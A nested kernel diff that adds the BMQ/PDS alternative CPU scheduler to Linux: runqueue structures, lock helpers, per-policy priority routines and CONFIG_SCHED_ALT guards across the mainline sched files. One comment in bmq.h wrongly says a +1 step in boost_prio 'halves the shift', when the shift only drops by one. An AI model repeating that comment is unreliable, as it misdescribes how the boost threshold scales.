-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
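-+
-+/*
-+ * One list head per priority level; a set bit in @bitmap marks a
-+ * non-empty level, so the highest-priority runnable task can be found
-+ * with a find-first-bit scan instead of walking every list.
-+ */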
-+
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For general cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within an RCU lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
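-+
-+/*
-+ * sched_cpu_topo_masks[] is ordered nearest-to-farthest (the CPU
-+ * itself, then SMT siblings, then coregroup/LLC, then core, then all
-+ * others), so the walk above returns a CPU from the topologically
-+ * closest level that intersects @mask.
-+ */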
-+
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ: callers such as
-+	 * sched_info_xxxx() may not hold rq->lock.
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ: callers such as
-+	 * sched_info_xxxx() may not hold rq->lock.
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are the scheduler APIs used by other kernel code.
-+ * They use a dummy rq_flags.
-+ * TODO: BMQ needs to support these APIs for compatibility with the
-+ * mainline scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
-+ * subtracted and would never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching is
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
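-+
-+/*
-+ * Arithmetic note: each +1 step in p->boost_prio halves the shift
-+ * above and therefore doubles boost_threshold(p).
-+ */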
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
-
- #include "idle.c"
-
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
-
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
-
- #include "cputime.c"
--#include "deadline.c"
-
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
-@@ -85,7 +85,9 @@
-
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
-
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
-
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
-
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
-
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
-
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
-
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
-
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
-
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
-
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
-
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
-
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
-
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
-
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_PREEMPT_DYNAMIC
-
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
-
- #endif /* CONFIG_PREEMPT_DYNAMIC */
-
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
-
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
-
- static struct dentry *debugfs_sched;
-
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
-
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
-
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
-
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
-
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
-
- 	return 0;
- }
- late_initcall(sched_init_debug);
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
-
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
-
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
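-+
-+/*
-+ * Rough magnitudes: a shift of 22 buckets rq->clock into 2^22 ns
-+ * (~4.19 ms) deadline edges, in line with a 4 ms timeslice, while the
-+ * shift of 21 chosen above gives 2^21 ns (~2.10 ms) edges for the
-+ * 2 ms timeslice case.
-+ */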
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
